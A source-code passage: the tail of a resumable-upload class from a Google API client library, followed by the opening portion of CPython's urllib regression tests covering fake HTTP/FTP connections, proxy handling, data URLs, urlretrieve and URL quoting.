self.EnsureUninitialized() http_response = http_wrapper.MakeRequest(http, http_request, retries=self.num_retries) if http_response.status_code != http_client.OK: raise exceptions.HttpError.FromResponse(http_response) self.__server_chunk_granularity = http_response.info.get( 'X-Goog-Upload-Chunk-Granularity') url = http_response.info['location'] if client is not None: url = client.FinalizeTransferUrl(url) self._Initialize(http, url) # Unless the user has requested otherwise, we want to just # go ahead and pump the bytes now. if self.auto_transfer: return self.StreamInChunks() return http_response def __GetLastByte(self, range_header): _, _, end = range_header.partition('-') # TODO(craigcitro): Validate start == 0? return int(end) def __ValidateChunksize(self, chunksize=None): if self.__server_chunk_granularity is None: return chunksize = chunksize or self.chunksize if chunksize % self.__server_chunk_granularity: raise exceptions.ConfigurationValueError( 'Server requires chunksize to be a multiple of %d', self.__server_chunk_granularity) def __StreamMedia(self, callback=None, finish_callback=None, additional_headers=None, use_chunks=True): """Helper function for StreamMedia / StreamInChunks.""" if self.strategy != RESUMABLE_UPLOAD: raise exceptions.InvalidUserInputError( 'Cannot stream non-resumable upload') callback = callback or self.progress_callback finish_callback = finish_callback or self.finish_callback # final_response is set if we resumed an already-completed upload. response = self.__final_response send_func = self.__SendChunk if use_chunks else self.__SendMediaBody if use_chunks: self.__ValidateChunksize(self.chunksize) self.EnsureInitialized() while not self.complete: response = send_func(self.stream.tell(), additional_headers=additional_headers) if response.status_code in (http_client.OK, http_client.CREATED): self.__complete = True break self.__progress = self.__GetLastByte(response.info['range']) if self.progress + 1 != self.stream.tell(): # TODO(craigcitro): Add a better way to recover here. raise exceptions.CommunicationError( 'Failed to transfer all bytes in chunk, upload paused at ' 'byte %d' % self.progress) self._ExecuteCallback(callback, response) if self.__complete and hasattr(self.stream, 'seek'): current_pos = self.stream.tell() self.stream.seek(0, os.SEEK_END) end_pos = self.stream.tell() self.stream.seek(current_pos) if current_pos != end_pos: raise exceptions.TransferInvalidError( 'Upload complete with %s additional bytes left in stream' % (int(end_pos) - int(current_pos))) self._ExecuteCallback(finish_callback, response) return response def StreamMedia(self, callback=None, finish_callback=None, additional_headers=None): """Send this resumable upload in a single request. Args: callback: Progress callback function with inputs (http_wrapper.Response, transfer.Upload) finish_callback: Final callback function with inputs (http_wrapper.Response, transfer.Upload) additional_headers: Dict of headers to include with the upload http_wrapper.Request. Returns: http_wrapper.Response of final response. """ return self.__StreamMedia( callback=callback, finish_callback=finish_callback, additional_headers=additional_headers, use_chunks=False) def StreamInChunks(self, callback=None, finish_callback=None, additional_headers=None): """Send this (resumable) upload in chunks.""" return self.__StreamMedia( callback=callback, finish_callback=finish_callback, additional_headers=additional_headers) def __SendMediaRequest(self, request, end): """Request helper function for SendMediaBody & SendChunk.""" response = http_wrapper.MakeRequest( self.bytes_http, request, retry_func=self.retry_func, retries=self.num_retries) if response.status_code not in (http_client.OK, http_client.CREATED, http_wrapper.RESUME_INCOMPLETE): # We want to reset our state to wherever the server left us # before this failed request, and then raise. self.RefreshResumableUploadState() raise exceptions.HttpError.FromResponse(response) if response.status_code == http_wrapper.RESUME_INCOMPLETE: last_byte = self.__GetLastByte( self._GetRangeHeaderFromResponse(response)) if last_byte + 1 != end: self.stream.seek(last_byte) return response def __SendMediaBody(self, start, additional_headers=None): """Send the entire media stream in a single request.""" self.EnsureInitialized() if self.total_size is None: raise exceptions.TransferInvalidError( 'Total size must be known for SendMediaBody') body_stream = stream_slice.StreamSlice( self.stream, self.total_size - start) request = http_wrapper.Request(url=self.url, http_method='PUT', body=body_stream) request.headers['Content-Type'] = self.mime_type if start == self.total_size: # End of an upload with 0 bytes left to send; just finalize. range_string = 'bytes */%s' % self.total_size else: range_string = 'bytes %s-%s/%s' % (start, self.total_size - 1, self.total_size) request.headers['Content-Range'] = range_string if additional_headers: request.headers.update(additional_headers) return self.__SendMediaRequest(request, self.total_size) def __SendChunk(self, start, additional_headers=None): """Send the specified chunk.""" self.EnsureInitialized() no_log_body = self.total_size is None if self.total_size is None: # For the streaming resumable case, we need to detect when # we're at the end of the stream. body_stream = buffered_stream.BufferedStream( self.stream, start, self.chunksize) end = body_stream.stream_end_position if body_stream.stream_exhausted: self.__total_size = end # TODO: Here, change body_stream from a stream to a string object, # which means reading a chunk into memory. This works around # https://code.google.com/p/httplib2/issues/detail?id=176 which can # cause httplib2 to skip bytes on 401's for file objects. # Rework this solution to be more general. body_stream = body_stream.read(self.chunksize) else: end = min(start + self.chunksize, self.total_size) body_stream = stream_slice.StreamSlice(self.stream, end - start) # TODO(craigcitro): Think about clearer errors on "no data in # stream". request = http_wrapper.Request(url=self.url, http_method='PUT', body=body_stream) request.headers['Content-Type'] = self.mime_type if no_log_body: # Disable logging of streaming body. # TODO: Remove no_log_body and rework as part of a larger logs # refactor. request.loggable_body = '<media body>' if self.total_size is None: # Streaming resumable upload case, unknown total size. range_string = 'bytes %s-%s/*' % (start, end - 1) elif end == start: # End of an upload with 0 bytes left to send; just finalize. range_string = 'bytes */%s' % self.total_size else: # Normal resumable upload case with known sizes. range_string = 'bytes %s-%s/%s' % (start, end - 1, self.total_size) request.headers['Content-Range'] = range_string if additional_headers: request.headers.update(additional_headers) return self.__SendMediaRequest(request, end)
test_urllib.py
"""Regression tests for what was in Python 2's "urllib" module""" import urllib.parse import urllib.request import urllib.error import http.client import email.message import io import unittest from unittest.mock import patch from test import support import os try: import ssl except ImportError: ssl = None import sys import tempfile from nturl2path import url2pathname, pathname2url from base64 import b64encode import collections def hexescape(char): """Escape char as RFC 2396 specifies""" hex_repr = hex(ord(char))[2:].upper() if len(hex_repr) == 1: hex_repr = "0%s" % hex_repr return "%" + hex_repr # Shortcut for testing FancyURLopener _urlopener = None def urlopen(url, data=None, proxies=None): """urlopen(url [, data]) -> open file-like object""" global _urlopener if proxies is not None: opener = urllib.request.FancyURLopener(proxies=proxies) elif not _urlopener: opener = FancyURLopener() _urlopener = opener else: opener = _urlopener if data is None: return opener.open(url) else: return opener.open(url, data) def FancyURLopener(): with support.check_warnings( ('FancyURLopener style of invoking requests is deprecated.', DeprecationWarning)): return urllib.request.FancyURLopener() def fakehttp(fakedata): class FakeSocket(io.BytesIO): io_refs = 1 def sendall(self, data): FakeHTTPConnection.buf = data def makefile(self, *args, **kwds): self.io_refs += 1 return self def read(self, amt=None): if self.closed: return b"" return io.BytesIO.read(self, amt) def readline(self, length=None): if self.closed: return b"" return io.BytesIO.readline(self, length) def close(self): self.io_refs -= 1 if self.io_refs == 0: io.BytesIO.close(self) class FakeHTTPConnection(http.client.HTTPConnection): # buffer to store data for verification in urlopen tests. buf = None def connect(self): self.sock = FakeSocket(self.fakedata) type(self).fakesock = self.sock FakeHTTPConnection.fakedata = fakedata return FakeHTTPConnection class FakeHTTPMixin(object): def fakehttp(self, fakedata): self._connection_class = http.client.HTTPConnection http.client.HTTPConnection = fakehttp(fakedata) def unfakehttp(self): http.client.HTTPConnection = self._connection_class class FakeFTPMixin(object): def fakeftp(self): class FakeFtpWrapper(object): def __init__(self, user, passwd, host, port, dirs, timeout=None, persistent=True): pass def retrfile(self, file, type): return io.BytesIO(), 0 def close(self): pass self._ftpwrapper_class = urllib.request.ftpwrapper urllib.request.ftpwrapper = FakeFtpWrapper def unfakeftp(self): urllib.request.ftpwrapper = self._ftpwrapper_class class urlopen_FileTests(unittest.TestCase): """Test urlopen() opening a temporary file. Try to test as much functionality as possible so as to cut down on reliance on connecting to the Net for testing. """ def setUp(self): # Create a temp file to use for testing self.text = bytes("test_urllib: %s\n" % self.__class__.__name__, "ascii") f = open(support.TESTFN, 'wb') try: f.write(self.text) finally: f.close() self.pathname = support.TESTFN self.returned_obj = urlopen("file:%s" % self.pathname) def tearDown(self): """Shut down the open object""" self.returned_obj.close() os.remove(support.TESTFN) def test_interface(self): # Make sure object returned by urlopen() has the specified methods for attr in ("read", "readline", "readlines", "fileno", "close", "info", "geturl", "getcode", "__iter__"): self.assertTrue(hasattr(self.returned_obj, attr), "object returned by urlopen() lacks %s attribute" % attr) def test_read(self): self.assertEqual(self.text, self.returned_obj.read()) def test_readline(self): self.assertEqual(self.text, self.returned_obj.readline()) self.assertEqual(b'', self.returned_obj.readline(), "calling readline() after exhausting the file did not" " return an empty string") def test_readlines(self): lines_list = self.returned_obj.readlines() self.assertEqual(len(lines_list), 1, "readlines() returned the wrong number of lines") self.assertEqual(lines_list[0], self.text, "readlines() returned improper text") def test_fileno(self): file_num = self.returned_obj.fileno() self.assertIsInstance(file_num, int, "fileno() did not return an int") self.assertEqual(os.read(file_num, len(self.text)), self.text, "Reading on the file descriptor returned by fileno() " "did not return the expected text") def test_close(self): # Test close() by calling it here and then having it be called again # by the tearDown() method for the test self.returned_obj.close() def test_info(self): self.assertIsInstance(self.returned_obj.info(), email.message.Message) def test_geturl(self): self.assertEqual(self.returned_obj.geturl(), self.pathname) def test_getcode(self): self.assertIsNone(self.returned_obj.getcode()) def test_iter(self): # Test iterator # Don't need to count number of iterations since test would fail the # instant it returned anything beyond the first line from the # comparison. # Use the iterator in the usual implicit way to test for ticket #4608. for line in self.returned_obj: self.assertEqual(line, self.text) def test_relativelocalfile(self): self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname) class ProxyTests(unittest.TestCase): def setUp(self): # Records changes to env vars self.env = support.EnvironmentVarGuard() # Delete all proxy related env vars for k in list(os.environ): if 'proxy' in k.lower(): self.env.unset(k) def tearDown(self): # Restore all proxy related env vars self.env.__exit__() del self.env def test_getproxies_environment_keep_no_proxies(self): self.env.set('NO_PROXY', 'localhost') proxies = urllib.request.getproxies_environment() # getproxies_environment use lowered case truncated (no '_proxy') keys self.assertEqual('localhost', proxies['no']) # List of no_proxies with space. self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234') self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com')) self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com:8888')) self.assertTrue(urllib.request.proxy_bypass_environment('newdomain.com:1234')) def test_proxy_cgi_ignore(self): try: self.env.set('HTTP_PROXY', 'http://somewhere:3128') proxies = urllib.request.getproxies_environment() self.assertEqual('http://somewhere:3128', proxies['http']) self.env.set('REQUEST_METHOD', 'GET') proxies = urllib.request.getproxies_environment() self.assertNotIn('http', proxies) finally: self.env.unset('REQUEST_METHOD') self.env.unset('HTTP_PROXY') def test_proxy_bypass_environment_host_match(self): bypass = urllib.request.proxy_bypass_environment self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234, .d.o.t') self.assertTrue(bypass('localhost')) self.assertTrue(bypass('LocalHost')) # MixedCase self.assertTrue(bypass('LOCALHOST')) # UPPERCASE self.assertTrue(bypass('newdomain.com:1234')) self.assertTrue(bypass('foo.d.o.t')) # issue 29142 self.assertTrue(bypass('anotherdomain.com:8888')) self.assertTrue(bypass('www.newdomain.com:1234')) self.assertFalse(bypass('prelocalhost')) self.assertFalse(bypass('newdomain.com')) # no port self.assertFalse(bypass('newdomain.com:1235')) # wrong port class ProxyTests_withOrderedEnv(unittest.TestCase): def setUp(self): # We need to test conditions, where variable order _is_ significant self._saved_env = os.environ # Monkey patch os.environ, start with empty fake environment os.environ = collections.OrderedDict() def tearDown(self): os.environ = self._saved_env def test_getproxies_environment_prefer_lowercase(self): # Test lowercase preference with removal os.environ['no_proxy'] = '' os.environ['No_Proxy'] = 'localhost' self.assertFalse(urllib.request.proxy_bypass_environment('localhost')) self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary')) os.environ['http_proxy'] = '' os.environ['HTTP_PROXY'] = 'http://somewhere:3128' proxies = urllib.request.getproxies_environment() self.assertEqual({}, proxies) # Test lowercase preference of proxy bypass and correct matching including ports os.environ['no_proxy'] = 'localhost, noproxy.com, my.proxy:1234' os.environ['No_Proxy'] = 'xyz.com' self.assertTrue(urllib.request.proxy_bypass_environment('localhost')) self.assertTrue(urllib.request.proxy_bypass_environment('noproxy.com:5678')) self.assertTrue(urllib.request.proxy_bypass_environment('my.proxy:1234')) self.assertFalse(urllib.request.proxy_bypass_environment('my.proxy')) self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary')) # Test lowercase preference with replacement os.environ['http_proxy'] = 'http://somewhere:3128' os.environ['Http_Proxy'] = 'http://somewhereelse:3128' proxies = urllib.request.getproxies_environment() self.assertEqual('http://somewhere:3128', proxies['http']) class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin): """Test urlopen() opening a fake http connection.""" def check_read(self, ver): self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!") try: fp = urlopen("http://python.org/") self.assertEqual(fp.readline(), b"Hello!") self.assertEqual(fp.readline(), b"") self.assertEqual(fp.geturl(), 'http://python.org/') self.assertEqual(fp.getcode(), 200) finally: self.unfakehttp() def test_url_fragment(self): # Issue #11703: geturl() omits fragments in the original URL. url = 'http://docs.python.org/library/urllib.html#OK' self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!") try: fp = urllib.request.urlopen(url) self.assertEqual(fp.geturl(), url) finally: self.unfakehttp() def test_willclose(self): self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!") try: resp = urlopen("http://www.python.org") self.assertTrue(resp.fp.will_close) finally: self.unfakehttp() def test_read_0_9(self): # "0.9" response accepted (but not "simple responses" without # a status line) self.check_read(b"0.9") def test_read_1_0(self): self.check_read(b"1.0") def test_read_1_1(self): self.check_read(b"1.1") def test_read_bogus(self): # urlopen() should raise OSError for many error codes. self.fakehttp(b'''HTTP/1.1 401 Authentication Required Date: Wed, 02 Jan 2008 03:03:54 GMT Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e Connection: close Content-Type: text/html; charset=iso-8859-1 ''') try: self.assertRaises(OSError, urlopen, "http://python.org/") finally: self.unfakehttp() def test_invalid_redirect(self): # urlopen() should raise OSError for many error codes. self.fakehttp(b'''HTTP/1.1 302 Found Date: Wed, 02 Jan 2008 03:03:54 GMT Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e Location: file://guidocomputer.athome.com:/python/license Connection: close Content-Type: text/html; charset=iso-8859-1 ''') try: msg = "Redirection to url 'file:" with self.assertRaisesRegex(urllib.error.HTTPError, msg): urlopen("http://python.org/") finally: self.unfakehttp() def test_redirect_limit_independent(self): # Ticket #12923: make sure independent requests each use their # own retry limit. for i in range(FancyURLopener().maxtries): self.fakehttp(b'''HTTP/1.1 302 Found Location: file://guidocomputer.athome.com:/python/license Connection: close ''') try: self.assertRaises(urllib.error.HTTPError, urlopen, "http://something") finally: self.unfakehttp() def test_empty_socket(self): # urlopen() raises OSError if the underlying socket does not send any # data. (#1680230) self.fakehttp(b'') try: self.assertRaises(OSError, urlopen, "http://something") finally: self.unfakehttp() def test_missing_localfile(self): # Test for #10836 with self.assertRaises(urllib.error.URLError) as e: urlopen('file://localhost/a/file/which/doesnot/exists.py') self.assertTrue(e.exception.filename) self.assertTrue(e.exception.reason) def test_file_notexists(self): fd, tmp_file = tempfile.mkstemp() tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/') try: self.assertTrue(os.path.exists(tmp_file)) with urlopen(tmp_fileurl) as fobj: self.assertTrue(fobj) finally: os.close(fd) os.unlink(tmp_file) self.assertFalse(os.path.exists(tmp_file)) with self.assertRaises(urllib.error.URLError): urlopen(tmp_fileurl) def test_ftp_nohost(self): test_ftp_url = 'ftp:///path' with self.assertRaises(urllib.error.URLError) as e: urlopen(test_ftp_url) self.assertFalse(e.exception.filename) self.assertTrue(e.exception.reason) def test_ftp_nonexisting(self): with self.assertRaises(urllib.error.URLError) as e: urlopen('ftp://localhost/a/file/which/doesnot/exists.py') self.assertFalse(e.exception.filename) self.assertTrue(e.exception.reason) @patch.object(urllib.request, 'MAXFTPCACHE', 0) def test_ftp_cache_pruning(self): self.fakeftp() try: urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, []) urlopen('ftp://localhost') finally: self.unfakeftp() def test_userpass_inurl(self): self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!") try: fp = urlopen("http://user:pass@python.org/") self.assertEqual(fp.readline(), b"Hello!") self.assertEqual(fp.readline(), b"") self.assertEqual(fp.geturl(), 'http://user:pass@python.org/') self.assertEqual(fp.getcode(), 200) finally: self.unfakehttp() def test_userpass_inurl_w_spaces(self): self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!") try: userpass = "a b:c d" url = "http://{}@python.org/".format(userpass) fakehttp_wrapper = http.client.HTTPConnection authorization = ("Authorization: Basic %s\r\n" % b64encode(userpass.encode("ASCII")).decode("ASCII")) fp = urlopen(url) # The authorization header must be in place self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8")) self.assertEqual(fp.readline(), b"Hello!") self.assertEqual(fp.readline(), b"") # the spaces are quoted in URL so no match self.assertNotEqual(fp.geturl(), url) self.assertEqual(fp.getcode(), 200) finally: self.unfakehttp() def test_URLopener_deprecation(self): with support.check_warnings(('',DeprecationWarning)): urllib.request.URLopener() @unittest.skipUnless(ssl, "ssl module required") def test_cafile_and_context(self): context = ssl.create_default_context() with support.check_warnings(('', DeprecationWarning)): with self.assertRaises(ValueError): urllib.request.urlopen( "https://localhost", cafile="/nonexistent/path", context=context ) class urlopen_DataTests(unittest.TestCase): """Test urlopen() opening a data URL.""" def setUp(self): # text containing URL special- and unicode-characters self.text = "test data URLs :;,%=& \u00f6 \u00c4 " # 2x1 pixel RGB PNG image with one black and one white pixel self.image = ( b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00' b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae' b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00' b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82') self.text_url = ( "data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3" "D%26%20%C3%B6%20%C3%84%20") self.text_url_base64 = ( "data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs" "sJT0mIPYgxCA%3D") # base64 encoded data URL that contains ignorable spaces, # such as "\n", " ", "%0A", and "%20". self.image_url = ( "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n" "QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 " "vHgAAAABJRU5ErkJggg%3D%3D%0A%20") self.text_url_resp = urllib.request.urlopen(self.text_url) self.text_url_base64_resp = urllib.request.urlopen( self.text_url_base64) self.image_url_resp = urllib.request.urlopen(self.image_url) def test_interface(self): # Make sure object returned by urlopen() has the specified methods for attr in ("read", "readline", "readlines", "close", "info", "geturl", "getcode", "__iter__"): self.assertTrue(hasattr(self.text_url_resp, attr), "object returned by urlopen() lacks %s attribute" % attr) def test_info(self): self.assertIsInstance(self.text_url_resp.info(), email.message.Message) self.assertEqual(self.text_url_base64_resp.info().get_params(), [('text/plain', ''), ('charset', 'ISO-8859-1')]) self.assertEqual(self.image_url_resp.info()['content-length'], str(len(self.image))) self.assertEqual(urllib.request.urlopen("data:,").info().get_params(), [('text/plain', ''), ('charset', 'US-ASCII')]) def test_geturl(self): self.assertEqual(self.text_url_resp.geturl(), self.text_url) self.assertEqual(self.text_url_base64_resp.geturl(), self.text_url_base64) self.assertEqual(self.image_url_resp.geturl(), self.image_url) def test_read_text(self): self.assertEqual(self.text_url_resp.read().decode( dict(self.text_url_resp.info().get_params())['charset']), self.text) def test_read_text_base64(self): self.assertEqual(self.text_url_base64_resp.read().decode( dict(self.text_url_base64_resp.info().get_params())['charset']), self.text) def test_read_image(self): self.assertEqual(self.image_url_resp.read(), self.image) def test_missing_comma(self): self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain') def test_invalid_base64_data(self): # missing padding character self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=') class urlretrieve_FileTests(unittest.TestCase): """Test urllib.urlretrieve() on local files""" def setUp(self): # Create a list of temporary files. Each item in the list is a file # name (absolute path or relative to the current working directory). # All files in this list will be deleted in the tearDown method. Note, # this only helps to makes sure temporary files get deleted, but it # does nothing about trying to close files that may still be open. It # is the responsibility of the developer to properly close files even # when exceptional conditions occur. self.tempFiles = [] # Create a temporary file. self.registerFileForCleanUp(support.TESTFN) self.text = b'testing urllib.urlretrieve' try: FILE = open(support.TESTFN, 'wb') FILE.write(self.text) FILE.close() finally: try: FILE.close() except: pass def tearDown(self): # Delete the temporary files. for each in self.tempFiles: try: os.remove(each) except: pass def constructLocalFileUrl(self, filePath): filePath = os.path.abspath(filePath) try: filePath.encode("utf-8") except UnicodeEncodeError: raise unittest.SkipTest("filePath is not encodable to utf8") return "file://%s" % urllib.request.pathname2url(filePath) def createNewTempFile(self, data=b""): """Creates a new temporary file containing the specified data, registers the file for deletion during the test fixture tear down, and returns the absolute path of the file.""" newFd, newFilePath = tempfile.mkstemp() try: self.registerFileForCleanUp(newFilePath) newFile = os.fdopen(newFd, "wb") newFile.write(data) newFile.close() finally: try: newFile.close() except: pass return newFilePath def registerFileForCleanUp(self, fileName): self.tempFiles.append(fileName) def test_basic(self): # Make sure that a local file just gets its own location returned and # a headers value is returned. result = urllib.request.urlretrieve("file:%s" % support.TESTFN) self.assertEqual(result[0], support.TESTFN) self.assertIsInstance(result[1], email.message.Message, "did not get an email.message.Message instance " "as second returned value") def test_copy(self): # Test that setting the filename argument works. second_temp = "%s.2" % support.TESTFN self.registerFileForCleanUp(second_temp) result = urllib.request.urlretrieve(self.constructLocalFileUrl( support.TESTFN), second_temp) self.assertEqual(second_temp, result[0]) self.assertTrue(os.path.exists(second_temp), "copy of the file was not " "made") FILE = open(second_temp, 'rb') try: text = FILE.read() FILE.close() finally: try: FILE.close() except: pass self.assertEqual(self.text, text) def test_reporthook(self): # Make sure that the reporthook works. def hooktester(block_count, block_read_size, file_size, count_holder=[0]): self.assertIsInstance(block_count, int) self.assertIsInstance(block_read_size, int) self.assertIsInstance(file_size, int) self.assertEqual(block_count, count_holder[0]) count_holder[0] = count_holder[0] + 1 second_temp = "%s.2" % support.TESTFN self.registerFileForCleanUp(second_temp) urllib.request.urlretrieve( self.constructLocalFileUrl(support.TESTFN), second_temp, hooktester) def test_reporthook_0_bytes(self): # Test on zero length file. Should call reporthook only 1 time. report = [] def hooktester(block_count, block_read_size, file_size, _report=report): _report.append((block_count, block_read_size, file_size)) srcFileName = self.createNewTempFile() urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName), support.TESTFN, hooktester) self.assertEqual(len(report), 1) self.assertEqual(report[0][2], 0) def test_reporthook_5_bytes(self): # Test on 5 byte file. Should call reporthook only 2 times (once when # the "network connection" is established and once when the block is # read). report = [] def hooktester(block_count, block_read_size, file_size, _report=report): _report.append((block_count, block_read_size, file_size)) srcFileName = self.createNewTempFile(b"x" * 5) urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName), support.TESTFN, hooktester) self.assertEqual(len(report), 2) self.assertEqual(report[0][2], 5) self.assertEqual(report[1][2], 5) def test_reporthook_8193_bytes(self): # Test on 8193 byte file. Should call reporthook only 3 times (once # when the "network connection" is established, once for the next 8192 # bytes, and once for the last byte). report = [] def hooktester(block_count, block_read_size, file_size, _report=report): _report.append((block_count, block_read_size, file_size)) srcFileName = self.createNewTempFile(b"x" * 8193) urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName), support.TESTFN, hooktester) self.assertEqual(len(report), 3) self.assertEqual(report[0][2], 8193) self.assertEqual(report[0][1], 8192) self.assertEqual(report[1][1], 8192) self.assertEqual(report[2][1], 8192) class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin): """Test urllib.urlretrieve() using fake http connections""" def test_short_content_raises_ContentTooShortError(self): self.fakehttp(b'''HTTP/1.1 200 OK Date: Wed, 02 Jan 2008 03:03:54 GMT Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e Connection: close Content-Length: 100 Content-Type: text/html; charset=iso-8859-1 FF ''') def _reporthook(par1, par2, par3): pass with self.assertRaises(urllib.error.ContentTooShortError): try: urllib.request.urlretrieve(support.TEST_HTTP_URL, reporthook=_reporthook) finally: self.unfakehttp() def test_short_content_raises_ContentTooShortError_without_reporthook(self): self.fakehttp(b'''HTTP/1.1 200 OK Date: Wed, 02 Jan 2008 03:03:54 GMT Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e Connection: close Content-Length: 100 Content-Type: text/html; charset=iso-8859-1 FF ''') with self.assertRaises(urllib.error.ContentTooShortError): try: urllib.request.urlretrieve(support.TEST_HTTP_URL) finally: self.unfakehttp() class QuotingTests(unittest.TestCase): r"""Tests for urllib.quote() and urllib.quote_plus() According to RFC 3986 (Uniform Resource Identifiers), to escape a character you write it as '%' + <2 character US-ASCII hex value>. The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly. Case does not matter on the hex letters. The various character sets specified are: Reserved characters : ";/?:@&=+$," Have special meaning in URIs and must be escaped if not being used for their special meaning Data characters : letters, digits, and "-_.!~*'()" Unreserved and do not need to be escaped; can be, though, if desired Control characters : 0x00 - 0x1F, 0x7F Have no use in URIs so must be escaped space : 0x20 Must be escaped Delimiters : '<>#%"' Must be escaped Unwise : "{}|\^[]`" Must be escaped """ def test_never_quote(self): # Make sure quote() does not quote letters, digits, and "_,.-" do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ", "abcdefghijklmnopqrstuvwxyz", "0123456789", "_.-~"]) result = urllib.parse.quote(do_not_quote) self.assertEqual(do_not_quote, result, "using quote(): %r != %r" % (do_not_quote, result)) result = urllib.parse.quote_plus(do_not_quote) self.assertEqual(do_not_quote, result, "using quote_plus(): %r != %r" % (do_not_quote, result)) def test_default_safe(self): # Test '/' is default value for 'safe' parameter self.assertEqual(urllib.parse.quote.__defaults__[0], '/') def test_safe(self): # Test setting 'safe' parameter does what it should do quote_by_default = "<>" result = urllib.parse.quote(quote_by_default, safe=quote_by_default) self.assertEqual(quote_by_default, result, "using quote(): %r != %r" % (quote_by_default, result)) result = urllib.parse.quote_plus(quote_by_default, safe=quote_by_default) self.assertEqual(quote_by_default, result, "using quote_plus(): %r != %r" % (quote_by_default, result)) # Safe expressed as bytes rather than str result = urllib.parse.quote(quote_by_default, safe=b"<>") self.assertEqual(quote_by_default, result, "using quote(): %r != %r" % (quote_by_default, result)) # "Safe" non-ASCII characters should have no effect # (Since URIs are not allowed to have non-ASCII characters) result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc") expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="") self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Same as above, but using a bytes rather than str result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc") expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="") self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) def test_default_quoting(self): # Make sure all characters that should be quoted are by default sans # space (separate test for that). should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F should_quote.append(r'<>#%"{}|\^[]`') should_quote.append(chr(127)) # For 0x7F should_quote = ''.join(should_quote) for char in should_quote: result = urllib.parse.quote(char) self.assertEqual(hexescape(char), result, "using quote(): " "%s should be escaped to %s, not %s" % (char, hexescape(char), result)) result = urllib.parse.quote_plus(char) self.assertEqual(hexescape(char), result, "using quote_plus(): " "%s should be escapes to %s, not %s" % (char, hexescape(char), result)) del should_quote partial_quote = "ab[]cd" expected = "ab%5B%5Dcd" result = urllib.parse.quote(partial_quote) self.assertEqual(expected, result, "using quote(): %r != %r" % (expected, result)) result = urllib.parse.quote_plus(partial_quote) self.assertEqual(expected, result, "using quote_plus(): %r != %r" % (expected, result)) def test_quoting_space(self): # Make sure quote() and quote_plus() handle spaces as specified in # their unique way result = urllib.parse.quote(' ') self.assertEqual(result, hexescape(' '), "using quote(): %r != %r" % (result, hexescape(' '))) result = urllib.parse.quote_plus(' ') self.assertEqual(result, '+', "using quote_plus(): %r != +" % result) given = "a b cd e f" expect = given.replace(' ', hexescape(' ')) result = urllib.parse.quote(given) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) expect = given.replace(' ', '+') result = urllib.parse.quote_plus(given) self.assertEqual(expect, result, "using quote_plus(): %r != %r" % (expect, result)) def test_quoting_plus(self): self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'), 'alpha%2Bbeta+gamma') self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'), 'alpha+beta+gamma') # Test with bytes self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'), 'alpha%2Bbeta+gamma') # Test with safe bytes self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'), 'alpha+beta+gamma') def test_quote_bytes(self): # Bytes should quote directly to percent-encoded values given = b"\xa2\xd8ab\xff" expect = "%A2%D8ab%FF" result = urllib.parse.quote(given) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Encoding argument should raise type error on bytes input self.assertRaises(TypeError, urllib.parse.quote, given, encoding="latin-1") # quote_from_bytes should work the same result = urllib.parse.quote_from_bytes(given) self.assertEqual(expect, result, "using quote_from_bytes(): %r != %r" % (expect, result)) def test_quote_with_unicode(self): # Characters in Latin-1 range, encoded by default in UTF-8 given = "\xa2\xd8ab\xff" expect = "%C2%A2%C3%98ab%C3%BF" result = urllib.parse.quote(given) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, 